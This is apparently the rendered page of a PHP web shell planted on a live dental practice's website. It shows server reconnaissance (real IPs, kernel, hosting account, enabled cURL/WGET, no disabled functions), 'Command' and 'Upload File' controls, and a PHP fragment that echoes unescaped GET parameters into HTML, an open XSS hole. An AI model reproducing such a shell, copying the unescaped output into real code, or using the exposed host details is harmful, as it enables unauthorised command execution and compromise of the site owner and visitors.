1Server IP : 217.21.90.164 / Your IP : 3.141.9.70 Web Server : LiteSpeed System : Linux in-mum-web840.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u367232671 ( 367232671) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u367232671/domains/zeropaindentist.com/public_html/img/product/offer/../../../inc/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php $MSG = 0; $MSG_C = "primary"; $MSG_H = "Done"; if (isset($_GET['MSG'])) { $MSG = trim($_GET['MSG']); if (isset($_GET['MSG_C'])) { $MSG_C = strtolower(trim($_GET['MSG_C'])); } if (isset($_GET['MSG_H'])) { $MSG_H = trim($_GET['MSG_H']); } echo " <div class='alert alert-$MSG_C alert-dismissible fade show' role='alert'> <strong>$MSG_H</strong> <hr> $MSG <button type='button' class='btn-close' data-bs-dismiss='alert' aria-label='Close'></button> </div> "; }